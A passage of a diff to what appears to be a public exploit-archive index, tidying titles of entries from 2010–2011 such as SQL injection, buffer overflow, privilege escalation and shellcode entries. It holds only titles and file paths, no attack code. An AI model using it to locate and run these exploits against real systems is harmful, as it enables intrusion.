15798,platforms/php/webapps/15798.txt,"Injader CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 15799,platforms/php/webapps/15799.txt,"Habari Blog - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 15800,platforms/php/webapps/15800.txt,"html-edit CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 15801,platforms/php/webapps/15801.txt,"Joomla Component com_xgallery 1.0 - Local File Inclusion",2010-12-21,KelvinX,php,webapps,0 -15802,platforms/windows/remote/15802.txt,"ecava integraxor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote,0 -15805,platforms/hardware/dos/15805.php,"Apple iPhone Safari - 'JS .' Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos,0 +15802,platforms/windows/remote/15802.txt,"ecava IntegraXor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote,0 +15805,platforms/hardware/dos/15805.php,"Apple iOS Safari - 'JS .' Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos,0 15804,platforms/php/webapps/15804.txt,"jobappr 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps,0 15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway - Command Injection",2010-12-22,"George D. Gal",linux,remote,0 15807,platforms/cgi/webapps/15807.txt,"Mitel AWC - Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps,0 -15808,platforms/php/webapps/15808.txt,"Wordpress Plugin Accept Signups 0.1 - Cross-Site Scripting",2010-12-22,clshack,php,webapps,0 +15808,platforms/php/webapps/15808.txt,"WordPress Plugin Accept Signups 0.1 - Cross-Site Scripting",2010-12-22,clshack,php,webapps,0 15809,platforms/windows/remote/15809.html,"WMITools ActiveX - Remote Command Execution Exploit",2010-12-22,WooYun,windows,remote,0 15810,platforms/hardware/webapps/15810.txt,"D-Link WBR-1310 - Authentication Bypass",2010-12-23,"Craig Heffner",hardware,webapps,0 15811,platforms/php/webapps/15811.txt,"Built2Go PHP Shopping - SQL Injection",2010-12-23,Br0ly,php,webapps,0 @@ -13748,7 +13749,7 @@ id,file,description,date,author,platform,type,port 15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",php,webapps,0 15827,platforms/php/webapps/15827.txt,"Joomla Component (com_idoblog) - SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0 15828,platforms/php/webapps/15828.txt,"Vacation Rental Script 4.0 - Cross-Site Request Forgery",2010-12-25,OnurTURKESHAN,php,webapps,0 -15838,platforms/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Site Scripting on Frontpage",2010-12-28,"Michael Brooks",php,webapps,0 +15838,platforms/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Site Scripting on FrontPage",2010-12-28,"Michael Brooks",php,webapps,0 15830,platforms/php/webapps/15830.txt,"Social Engine 4.x - (Music Plugin) Arbitrary File Upload",2010-12-25,MyDoom,php,webapps,0 15831,platforms/php/webapps/15831.txt,"LoveCMS 1.6.2 Final - Multiple Local File Inclusion",2010-12-25,cOndemned,php,webapps,0 15832,platforms/php/webapps/15832.txt,"Interact 2.4.1 - SQL Injection",2010-12-26,"IR Security",php,webapps,0 @@ -13759,11 +13760,11 @@ id,file,description,date,author,platform,type,port 15839,platforms/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor - '.cov' Memory Corruption",2010-12-28,rgod,windows,dos,0 15840,platforms/php/webapps/15840.txt,"ardeaCore 2.25 - PHP Framework Remote File Inclusion",2010-12-29,n0n0x,php,webapps,0 15842,platforms/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",hardware,remote,0 -15843,platforms/php/webapps/15843.txt,"News Script PHP Pro - (fckeditor) File Upload",2010-12-29,Net.Edit0r,php,webapps,0 +15843,platforms/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' File Upload",2010-12-29,Net.Edit0r,php,webapps,0 15846,platforms/php/webapps/15846.txt,"kaibb 1.0.1 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15847,platforms/php/webapps/15847.txt,"DzTube - SQL Injection",2010-12-29,"errnick qwe",php,webapps,0 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection",2010-12-29,hiphop,php,webapps,0 -15845,platforms/windows/dos/15845.py,"IrfanView 4.27 - JP2000.dll plugin Denial of Service",2010-12-29,BraniX,windows,dos,0 +15845,platforms/windows/dos/15845.py,"Irfanview 4.27 - JP2000.dll plugin Denial of Service",2010-12-29,BraniX,windows,dos,0 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - Cross-Site Request Forgery Code Injection",2010-12-29,hiphop,php,webapps,0 15850,platforms/php/webapps/15850.html,"PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0 15851,platforms/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 - Denial of Service",2010-12-29,BraniX,windows,dos,0 @@ -13772,15 +13773,15 @@ id,file,description,date,author,platform,type,port 15856,platforms/php/webapps/15856.php,"TYPO3 - Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0 15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - '.pls' SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0 -15858,platforms/php/webapps/15858.txt,"Wordpress 3.0.3 - Persistent Cross-Site Scripting (IE6/7 NS8.1)",2010-12-29,Saif,php,webapps,0 +15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (IE6/7 NS8.1)",2010-12-29,Saif,php,webapps,0 15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - RETR CMD Denial of Service",2010-12-29,emgent,windows,dos,0 15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15864,platforms/php/webapps/15864.txt,"Ignition 1.3 - (page.php) Local File Inclusion",2010-12-30,cOndemned,php,webapps,0 -15865,platforms/php/webapps/15865.php,"Ignition 1.3 - Remote Code Execution Exploit",2010-12-30,cOndemned,php,webapps,0 +15865,platforms/php/webapps/15865.php,"Ignition 1.3 - Remote Code Execution",2010-12-30,cOndemned,php,webapps,0 15866,platforms/windows/remote/15866.html,"Chilkat Software FTP2 - ActiveX Component Remote Code Execution",2010-12-30,rgod,windows,remote,0 -15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - Cross-Site Scripting / Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0 +15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - Cross-Site Scripting / Remote Code Execution",2011-01-05,mr_me,php,webapps,0 15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary - 'src .php' File Download",2010-12-30,"Yakir Wizman",windows,remote,0 15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0 15879,platforms/win_x86/shellcode/15879.txt,"Win32 - speaking Shellcode",2010-12-31,Skylined,win_x86,shellcode,0 @@ -13794,12 +13795,12 @@ id,file,description,date,author,platform,type,port 15891,platforms/php/webapps/15891.txt,"GALLARIFIC PHP Photo Gallery Script - 'gallery.php' SQL Injection",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0 15892,platforms/php/webapps/15892.html,"YourTube 1.0 - Cross-Site Request Forgery (Add User)",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0 15893,platforms/php/webapps/15893.py,"amoeba CMS 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0 -15894,platforms/windows/dos/15894.c,"Windows - Class Handling (MS10-073)",2011-01-02,"Tarjei Mandt",windows,dos,0 +15894,platforms/windows/dos/15894.c,"Microsoft Windows - Class Handling (MS10-073)",2011-01-02,"Tarjei Mandt",windows,dos,0 18245,platforms/multiple/remote/18245.py,"Splunk - Remote Root Exploit",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0 15896,platforms/php/webapps/15896.txt,"Sahana Agasti 0.6.4 - Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0 15897,platforms/windows/dos/15897.py,"Music Animation Machine MIDI Player - Local Crash (PoC)",2011-01-03,c0d3R'Z,windows,dos,0 15898,platforms/multiple/dos/15898.py,"Wireshark - ENTTEC DMX Data RLE Buffer Overflow",2011-01-03,"non-customers crew",multiple,dos,0 -15902,platforms/php/webapps/15902.html,"S40 CMS 0.4.1 - Change Admin Passwd Cross-Site Request Forgery Exploit",2011-01-04,pentesters.ir,php,webapps,0 +15902,platforms/php/webapps/15902.html,"S40 CMS 0.4.1 - Change Admin Password Cross-Site Request Forgery Exploit",2011-01-04,pentesters.ir,php,webapps,0 15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - SEH Buffer Overflow",2011-01-04,Acidgen,windows,local,0 15905,platforms/windows/dos/15905.py,"Xynph 1.0 - USER Denial of Service",2011-01-04,freak_out,windows,dos,0 15991,platforms/windows/remote/15991.html,"Real Networks RealPlayer SP - 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote,0 @@ -13825,28 +13826,28 @@ id,file,description,date,author,platform,type,port 15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote Denial of Service in RDS Service",2011-01-08,Pepelux,windows,dos,0 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow (SEH)",2011-01-08,fdiskyou,windows,local,0 15942,platforms/php/webapps/15942.txt,"sahana agasti 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0 -15943,platforms/php/webapps/15943.txt,"Wordpress Plugin mingle forum 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 +15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Privilege Escalation (2)",2011-01-08,"Joe Sylve",linux,local,0 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion",2011-01-08,"Abdi Mohamed",php,webapps,0 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 -15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0 +15946,platforms/windows/dos/15946.py,"Irfanview 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0 15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin 4.5.1 - Local File Disclosure",2011-01-09,dun,php,webapps,0 -15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 - .MXE File Syntactic Analysis Buffer Overflow (PoC)",2011-01-10,LiquidWorm,windows,dos,0 -15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - (fckeditor) Arbitrary File Upload",2011-01-10,eidelweiss,php,webapps,0 +15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 - '.MXE' File Syntactic Analysis Buffer Overflow (PoC)",2011-01-10,LiquidWorm,windows,dos,0 +15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - 'FCKeditor' Arbitrary File Upload",2011-01-10,eidelweiss,php,webapps,0 15962,platforms/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Privilege Escalation",2011-01-10,peri.carding,solaris,local,0 -15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0 -15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - Local File Inclusion / Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0 +15963,platforms/windows/remote/15963.rb,"Microsoft Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0 +15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - Local File Inclusion / Remote Code Execution",2011-01-10,mr_me,php,webapps,0 15968,platforms/php/webapps/15968.txt,"vam shop 1.6 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15969,platforms/php/webapps/15969.txt,"diafan.cms 4.3 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15970,platforms/php/webapps/15970.txt,"Cambio 0.5a - Cross-Site Request Forgery",2011-01-11,"High-Tech Bridge SA",php,webapps,0 -15966,platforms/php/webapps/15966.txt,"ExtCalendar 2 - 'calendar.php' SQL Injection",2011-01-11,"Lagripe-Dz and Mca-Crb",php,webapps,0 +15966,platforms/php/webapps/15966.txt,"Extcalendar 2 - 'calendar.php' SQL Injection",2011-01-11,"Lagripe-Dz and Mca-Crb",php,webapps,0 15967,platforms/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15971,platforms/php/webapps/15971.txt,"whCMS 0.115 - Cross-Site Request Forgery",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15972,platforms/windows/local/15972.c,"DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0 15973,platforms/multiple/dos/15973.txt,"Wireshark - ZigBee ZCL Dissector Infinite Loop Denial of Service",2011-01-11,"Fred Fierling",multiple,dos,0 15974,platforms/linux/dos/15974.txt,"Mono/Moonlight Generic Type Argument - Privilege Escalation",2011-01-11,"Chris Howie",linux,dos,0 16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow",2011-03-02,"C4SS!0 G0M3S",windows,local,0 -15975,platforms/windows/local/15975.py,"Nokia Multimedia Player 1.0 - SEH Unicode Exploit",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 +15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - SEH Unicode Exploit",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 15981,platforms/php/webapps/15981.txt,"LifeType 1.2.10 - HTTP Referer Persistent Cross-Site Scripting",2011-01-12,"Saif El-Sherei",php,webapps,0 15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components - Exploit (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0 15979,platforms/php/webapps/15979.txt,"Joomla! - Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0 @@ -13861,7 +13862,7 @@ id,file,description,date,author,platform,type,port 15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player - Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0 15995,platforms/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",2011-01-15,Saif,php,webapps,0 15996,platforms/php/webapps/15996.txt,"compactcms 1.4.1 - Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 -15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution Exploit",2011-01-16,mr_me,jsp,webapps,0 +15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",2011-01-16,mr_me,jsp,webapps,0 15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys 2011.1.13.89 - Local Kernel Mode Denial of Service",2011-01-16,MJ0011,windows,dos,0 15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 - (bid) Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0 16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0 @@ -13872,7 +13873,7 @@ id,file,description,date,author,platform,type,port 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow",2011-01-18,h1ch4m,windows,local,0 16010,platforms/php/webapps/16010.txt,"allCineVid Joomla Component 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0 -16011,platforms/php/webapps/16011.txt,"CakePHP 1.3.5 / 1.2.8 - unserialize()",2011-01-18,felix,php,webapps,0 +16011,platforms/php/webapps/16011.txt,"CakePHP 1.3.5 / 1.2.8 - Unserialize()",2011-01-18,felix,php,webapps,0 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Remote Admin Add Cross-Site Request Forgery Exploit",2011-01-18,anT!-Tr0J4n,php,webapps,0 16014,platforms/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0 17209,platforms/php/webapps/17209.txt,"SoftMP3 - SQL Injection",2011-04-24,mArTi,php,webapps,0 @@ -13884,7 +13885,7 @@ id,file,description,date,author,platform,type,port 16021,platforms/windows/dos/16021.c,"Look n stop - Local Denial of Service",2011-01-21,Heurs,windows,dos,0 16022,platforms/windows/dos/16022.c,"Panda Global Protection 2010 - Local Denial of Service",2011-01-21,Heurs,windows,dos,0 16023,platforms/windows/dos/16023.c,"Panda Global Protection 2010 - Local Denial of Service (unfiltered wcscpy())",2011-01-21,Heurs,windows,dos,0 -16024,platforms/windows/local/16024.txt,"Microsoft Fax - Cover Page Editor 5.2.3790.3959 Double Free Memory Corruption",2011-01-24,"Luigi Auriemma",windows,local,0 +16024,platforms/windows/local/16024.txt,"Microsoft Fax - Cover Page Editor 5.2.3790.3959 Double-Free Memory Corruption",2011-01-24,"Luigi Auriemma",windows,local,0 16025,platforms/freebsd_x86/shellcode/16025.c,"FreeBSD/x86 - connect back Shellcode (81 bytes)",2011-01-21,Tosh,freebsd_x86,shellcode,0 16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - 31337 portbind + fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 16027,platforms/php/webapps/16027.txt,"phpcms 9.0 - Blind SQL Injection",2011-01-22,eidelweiss,php,webapps,0 @@ -13936,9 +13937,9 @@ id,file,description,date,author,platform,type,port 16090,platforms/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 16091,platforms/php/webapps/16091.txt,"Joomla! 1.5 & 1.6 - JFilterInput Cross-Site Scripting Bypass",2011-02-01,"Jeff Channell",php,webapps,0 16092,platforms/windows/local/16092.py,"CodeBlocks 8.02 - (cbp) Buffer Overflow",2011-02-01,sup3r,windows,local,0 -16094,platforms/php/webapps/16094.txt,"Raja Natarajan GuestBook 1.0 - Local File Inclusion",2011-02-02,h0rd,php,webapps,0 -16095,platforms/linux/dos/16095.pl,"Terminal Server Client - .rdp Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0 -16096,platforms/php/webapps/16096.txt,"redaxscript 0.3.2 - Multiple Vulnerabilities",2011-02-02,"High-Tech Bridge SA",php,webapps,0 +16094,platforms/php/webapps/16094.txt,"Raja Natarajan Guestbook 1.0 - Local File Inclusion",2011-02-02,h0rd,php,webapps,0 +16095,platforms/linux/dos/16095.pl,"Terminal Server Client - '.rdp' Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0 +16096,platforms/php/webapps/16096.txt,"RedaxScript 0.3.2 - Multiple Vulnerabilities",2011-02-02,"High-Tech Bridge SA",php,webapps,0 16097,platforms/php/webapps/16097.txt,"Zikula CMS 1.2.4 - Cross-Site Request Forgery",2011-02-02,"Aung Khant",php,webapps,0 16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0 16099,platforms/android/local/16099.c,"Android 1.x/2.x - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0 @@ -13951,7 +13952,7 @@ id,file,description,date,author,platform,type,port 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 - '.rtx' Buffer Overflow",2011-02-03,sickness,windows,local,0 16108,platforms/multiple/dos/16108.txt,"VLC Media Player - Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0 16109,platforms/php/webapps/16109.txt,"podcast generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 -16113,platforms/php/webapps/16113.txt,"osCommerce - authentication bypass",2011-02-04,"Nicolas Krassas",php,webapps,0 +16113,platforms/php/webapps/16113.txt,"osCommerce - Authentication Bypass",2011-02-04,"Nicolas Krassas",php,webapps,0 16114,platforms/php/webapps/16114.txt,"Chamilo 1.8.7 / Dokeos 1.8.6 - Remote File Disclosure",2011-02-05,beford,php,webapps,0 16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Info Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0 16117,platforms/php/webapps/16117.txt,"Escort und Begleitservice Agentur Script - SQL Injection",2011-02-05,NoNameMT,php,webapps,0 @@ -13959,12 +13960,12 @@ id,file,description,date,author,platform,type,port 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Denial of Service Skinfile",2011-02-06,badc0re,windows,dos,0 16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0 16122,platforms/php/webapps/16122.txt,"Dew-NewPHPLinks 2.1b - 'index.php' SQL Injection",2011-02-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 -16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 Wordpress Plugin - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0 +16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 WordPress Plugin - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16127,platforms/php/webapps/16127.txt,"T-Content Managment System - Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0 16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Persistent Cross-Site Scripting via useragent http header Injection",2011-02-07,"Saif El-Sherei",php,webapps,0 16129,platforms/linux/dos/16129.txt,"ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0 16130,platforms/php/webapps/16130.txt,"MyMarket 1.71 - 'index.php' SQL Injection",2011-02-07,ahmadso,php,webapps,0 -16131,platforms/php/webapps/16131.txt,"SWFUpload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0 +16131,platforms/php/webapps/16131.txt,"SWFupload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16133,platforms/windows/local/16133.htm,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16134,platforms/php/webapps/16134.txt,"Model Agentur Script - SQL Injection",2011-02-08,NoNameMT,php,webapps,0 @@ -13974,15 +13975,15 @@ id,file,description,date,author,platform,type,port 16138,platforms/windows/local/16138.c,"DESlock+ <= 4.1.10 - vdlptokn.sys Local Kernel Ring0 SYSTEM Exploit",2011-02-09,mu-b,windows,local,0 16139,platforms/php/webapps/16139.txt,"Auto Database System 1.0 Infusion Addon - SQL Injection",2011-02-09,Saif,php,webapps,0 16140,platforms/php/webapps/16140.txt,"Web 2.0 Social Network Freunde Community - SQL Injection",2011-02-09,NoNameMT,php,webapps,0 -16141,platforms/windows/local/16141.py,"xRadio 0.95b - (.xrl) Local Buffer Overflow (SEH)",2011-02-09,b0telh0,windows,local,0 +16141,platforms/windows/local/16141.py,"xRadio 0.95b - '.xrl' Local Buffer Overflow (SEH)",2011-02-09,b0telh0,windows,local,0 16167,platforms/php/webapps/16167.txt,"jSchool Advanced - SQL Injection",2011-02-14,eXa.DisC,php,webapps,0 16168,platforms/php/webapps/16168.txt,"runcms 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0 16143,platforms/php/webapps/16143.txt,"MihanTools Script 1.3.3 - SQL Injection",2011-02-09,WHITE_DEVIL,php,webapps,0 -16144,platforms/php/webapps/16144.txt,"Enable Media Replace Wordpress Plugin - Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps,0 +16144,platforms/php/webapps/16144.txt,"Enable Media Replace WordPress Plugin - Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps,0 16145,platforms/windows/remote/16145.pl,"Unreal Tournament - Remote Buffer Overflow (SEH)",2011-02-09,Fulcrum,windows,remote,0 -16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - (Login parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 +16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - (Login Parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Script",2011-02-14,_84kur10_,php,webapps,0 -16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Pre-Authenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 +16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Pre-Authentication BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - Cross-Site Scripting",2011-02-09,Sw1tCh,php,webapps,0 16149,platforms/hardware/remote/16149.txt,"Linksys WAP610N - Unauthenticated Root Access Security",2011-02-10,"Matteo Ignaccolo",hardware,remote,0 16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - (TYPE) Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0 @@ -13991,10 +13992,10 @@ id,file,description,date,author,platform,type,port 16154,platforms/php/webapps/16154.txt,"Horde - Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,php,webapps,0 16155,platforms/php/webapps/16155.txt,"Geomi CMS 1.2 & 3.0 - SQL Injection",2011-02-11,"ThunDEr HeaD",php,webapps,0 16156,platforms/php/webapps/16156.txt,"Kunena < 1.5.13 / < 1.6.3 - SQL Injection",2011-02-11,"Red Matter",php,webapps,0 -16157,platforms/jsp/webapps/16157.py,"Openedit 5.1294 - Remote Code Execution Exploit",2011-02-11,mr_me,jsp,webapps,0 +16157,platforms/jsp/webapps/16157.py,"Openedit 5.1294 - Remote Code Execution",2011-02-11,mr_me,jsp,webapps,0 16158,platforms/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 16159,platforms/php/webapps/16159.txt,"Escort Agency CMS - Blind SQL Injection",2011-02-12,NoNameMT,php,webapps,0 -16160,platforms/php/webapps/16160.txt,"Pixelpost 1.7.3 - Multiple POST Variables SQL Injection",2011-02-12,LiquidWorm,php,webapps,0 +16160,platforms/php/webapps/16160.txt,"PixelPost 1.7.3 - Multiple POST Variables SQL Injection",2011-02-12,LiquidWorm,php,webapps,0 16162,platforms/windows/local/16162.pl,"CuteZip 2.1 - Buffer Overflow",2011-02-12,"C4SS!0 G0M3S",windows,local,0 16169,platforms/windows/local/16169.py,"Oracle 10/11g - exp.exe Parameter file Local Buffer Overflow (PoC)",2011-02-15,mr_me,windows,local,0 16170,platforms/php/webapps/16170.txt,"phpMyBitTorrent 2.0.4 - SQL Injection",2011-02-15,#forkbombers,php,webapps,0 @@ -14003,11 +14004,11 @@ id,file,description,date,author,platform,type,port 16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection",2011-02-15,"High-Tech Bridge SA",php,webapps,0 -16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow (Post-Authenticated)",2011-02-16,chap0,windows,remote,0 +16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Post-Authentication) Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent - SQL 